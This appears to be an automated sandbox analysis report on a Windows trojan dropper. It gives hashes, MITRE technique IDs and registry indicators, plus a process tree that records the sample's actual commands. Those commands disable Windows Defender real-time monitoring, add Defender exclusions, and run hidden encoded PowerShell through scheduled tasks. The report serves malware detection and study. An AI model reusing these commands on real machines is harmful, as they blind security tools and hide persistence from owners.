768fb46335f40f77f4e537dfacdd12beabe553de01f611f33d7048a3e1204189

Analysis

max time kernel
146s
max time network
153s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
03/12/2022, 11:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

7.2MB
MD5

d7d3b3086012dffcae409a1724c65be2
SHA1

d0bf289ffce50c2225eeebf52cb7ef2aef8ca211
SHA256

768fb46335f40f77f4e537dfacdd12beabe553de01f611f33d7048a3e1204189
SHA512

e6680ef952181d39d948620d56d12dbae5c5b8d0797e549511dcb350d446a9479a0c4d73a4df8cc6f82dc8f46381a2f65dc9df57d4f2b1882249d42c807475eb
SSDEEP

196608:91OgChqsYavMjT9jIytIr8wRzIEOmOm+CzB69kkIEU:3OgQvS91tMOmH+ecVU

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe

Windows security bypass 2 TTPs 36 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SujJyapQU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\unbSVlDQXQjsaxVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KmoeShbwUzrnmirG = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\NwWnSVCJUZPuhljTr = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\NwWnSVCJUZPuhljTr = "0"	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KmoeShbwUzrnmirG = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SujJyapQU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ueaZBVbXTVTWoHMzrWR = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VpXMCztxnUUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sWwqLQemyBgU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ueaZBVbXTVTWoHMzrWR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VpXMCztxnUUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sWwqLQemyBgU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sZOjQNlEpKWJC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\unbSVlDQXQjsaxVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KmoeShbwUzrnmirG = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KmoeShbwUzrnmirG = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sZOjQNlEpKWJC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Executes dropped EXE 3 IoCs

pid	Process
2008	Install.exe
892	Install.exe
1696	HnjoIBk.exe

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Loads dropped DLL 8 IoCs

pid	Process
1764	file.exe
2008	Install.exe
2008	Install.exe
2008	Install.exe
2008	Install.exe
892	Install.exe
892	Install.exe
892	Install.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	HnjoIBk.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	HnjoIBk.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	HnjoIBk.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\brKUROVbwBBwKqPVYi.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1700	schtasks.exe
1072	schtasks.exe
936	schtasks.exe
1632	schtasks.exe
1168	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 9 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1796	powershell.EXE
1796	powershell.EXE
1796	powershell.EXE
1416	powershell.EXE
1416	powershell.EXE
1416	powershell.EXE
1528	powershell.EXE
1528	powershell.EXE
1528	powershell.EXE
1604	powershell.EXE
1604	powershell.EXE
1604	powershell.EXE

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1796	powershell.EXE
Token: SeDebugPrivilege	1416	powershell.EXE
Token: SeDebugPrivilege	1528	powershell.EXE
Token: SeDebugPrivilege	1604	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1764 wrote to memory of 2008	1764	file.exe	26
PID 1764 wrote to memory of 2008	1764	file.exe	26
PID 1764 wrote to memory of 2008	1764	file.exe	26
PID 1764 wrote to memory of 2008	1764	file.exe	26
PID 1764 wrote to memory of 2008	1764	file.exe	26
PID 1764 wrote to memory of 2008	1764	file.exe	26
PID 1764 wrote to memory of 2008	1764	file.exe	26
PID 2008 wrote to memory of 892	2008	Install.exe	27
PID 2008 wrote to memory of 892	2008	Install.exe	27
PID 2008 wrote to memory of 892	2008	Install.exe	27
PID 2008 wrote to memory of 892	2008	Install.exe	27
PID 2008 wrote to memory of 892	2008	Install.exe	27
PID 2008 wrote to memory of 892	2008	Install.exe	27
PID 2008 wrote to memory of 892	2008	Install.exe	27
PID 892 wrote to memory of 268	892	Install.exe	29
PID 892 wrote to memory of 268	892	Install.exe	29
PID 892 wrote to memory of 268	892	Install.exe	29
PID 892 wrote to memory of 268	892	Install.exe	29
PID 892 wrote to memory of 268	892	Install.exe	29
PID 892 wrote to memory of 268	892	Install.exe	29
PID 892 wrote to memory of 268	892	Install.exe	29
PID 892 wrote to memory of 1676	892	Install.exe	31
PID 892 wrote to memory of 1676	892	Install.exe	31
PID 892 wrote to memory of 1676	892	Install.exe	31
PID 892 wrote to memory of 1676	892	Install.exe	31
PID 892 wrote to memory of 1676	892	Install.exe	31
PID 892 wrote to memory of 1676	892	Install.exe	31
PID 892 wrote to memory of 1676	892	Install.exe	31
PID 1676 wrote to memory of 1544	1676	forfiles.exe	34
PID 1676 wrote to memory of 1544	1676	forfiles.exe	34
PID 1676 wrote to memory of 1544	1676	forfiles.exe	34
PID 1676 wrote to memory of 1544	1676	forfiles.exe	34
PID 1676 wrote to memory of 1544	1676	forfiles.exe	34
PID 1676 wrote to memory of 1544	1676	forfiles.exe	34
PID 1676 wrote to memory of 1544	1676	forfiles.exe	34
PID 268 wrote to memory of 624	268	forfiles.exe	33
PID 268 wrote to memory of 624	268	forfiles.exe	33
PID 268 wrote to memory of 624	268	forfiles.exe	33
PID 268 wrote to memory of 624	268	forfiles.exe	33
PID 268 wrote to memory of 624	268	forfiles.exe	33
PID 268 wrote to memory of 624	268	forfiles.exe	33
PID 268 wrote to memory of 624	268	forfiles.exe	33
PID 1544 wrote to memory of 1696	1544	cmd.exe	35
PID 1544 wrote to memory of 1696	1544	cmd.exe	35
PID 1544 wrote to memory of 1696	1544	cmd.exe	35
PID 1544 wrote to memory of 1696	1544	cmd.exe	35
PID 1544 wrote to memory of 1696	1544	cmd.exe	35
PID 1544 wrote to memory of 1696	1544	cmd.exe	35
PID 1544 wrote to memory of 1696	1544	cmd.exe	35
PID 624 wrote to memory of 1036	624	cmd.exe	36
PID 624 wrote to memory of 1036	624	cmd.exe	36
PID 624 wrote to memory of 1036	624	cmd.exe	36
PID 624 wrote to memory of 1036	624	cmd.exe	36
PID 624 wrote to memory of 1036	624	cmd.exe	36
PID 624 wrote to memory of 1036	624	cmd.exe	36
PID 624 wrote to memory of 1036	624	cmd.exe	36
PID 1544 wrote to memory of 816	1544	cmd.exe	37
PID 1544 wrote to memory of 816	1544	cmd.exe	37
PID 1544 wrote to memory of 816	1544	cmd.exe	37
PID 1544 wrote to memory of 816	1544	cmd.exe	37
PID 1544 wrote to memory of 816	1544	cmd.exe	37
PID 1544 wrote to memory of 816	1544	cmd.exe	37
PID 1544 wrote to memory of 816	1544	cmd.exe	37
PID 624 wrote to memory of 1632	624	cmd.exe	38

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1764
- C:\Users\Admin\AppData\Local\Temp\7zS6E2F.tmp\Install.exe
  .\Install.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2008
- - C:\Users\Admin\AppData\Local\Temp\7zS78F8.tmp\Install.exe
    .\Install.exe /S /site_id "525403"
    3⤵
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Drops file in System32 directory
    - Enumerates system info in registry
    - Suspicious use of WriteProcessMemory
    PID:892
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:268
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:624
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        6⤵
        
        PID:1036
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        6⤵
        
        PID:1632
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1676
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1544
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        6⤵
        
        PID:1696
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        6⤵
        
        PID:816
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "gMtJfTYvL" /SC once /ST 06:25:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      4⤵
      Creates scheduled task(s)
      PID:1072
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "gMtJfTYvL"
      4⤵
      PID:2024
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "gMtJfTYvL"
      4⤵
      PID:1272
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "brKUROVbwBBwKqPVYi" /SC once /ST 12:20:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\NwWnSVCJUZPuhljTr\jatvUSgFXMIwNss\HnjoIBk.exe\" ha /site_id 525403 /S" /V1 /F
      4⤵
      Drops file in Windows directory
      Creates scheduled task(s)
      PID:936

C:\Windows\system32\taskeng.exe
taskeng.exe {B16BDF9B-8C4C-425D-BC77-1C35D1144AA4} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]
1⤵
PID:1128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1796
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1476
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1416
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:340
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1528
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1144
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1604
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1768

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:740

C:\Windows\system32\taskeng.exe
taskeng.exe {14FF3C85-37BE-4536-817A-EBA7A70D0A9B} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1788
- C:\Users\Admin\AppData\Local\Temp\NwWnSVCJUZPuhljTr\jatvUSgFXMIwNss\HnjoIBk.exe
  C:\Users\Admin\AppData\Local\Temp\NwWnSVCJUZPuhljTr\jatvUSgFXMIwNss\HnjoIBk.exe ha /site_id 525403 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:1696
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gvQyAQnXB" /SC once /ST 06:16:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1632
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gvQyAQnXB"
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gvQyAQnXB"
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:1560
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1476
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:1700
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1092
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gcgHWMfxw" /SC once /ST 02:49:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1168
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gcgHWMfxw"
    3⤵
    PID:1720
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gcgHWMfxw"
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KmoeShbwUzrnmirG" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1744
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KmoeShbwUzrnmirG" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:856
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KmoeShbwUzrnmirG" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1728
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KmoeShbwUzrnmirG" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1688
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KmoeShbwUzrnmirG" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1988
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KmoeShbwUzrnmirG" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:612
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KmoeShbwUzrnmirG" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:340
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KmoeShbwUzrnmirG" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\KmoeShbwUzrnmirG\bWwtOiGB\mDRTFKXlbMzCnGPR.wsf"
    3⤵
    PID:1272
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\KmoeShbwUzrnmirG\bWwtOiGB\mDRTFKXlbMzCnGPR.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:1884
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SujJyapQU" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1692
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SujJyapQU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1556
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VpXMCztxnUUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1468
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VpXMCztxnUUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1444
  - - C:\Windows\SysWOW64\reg.exe
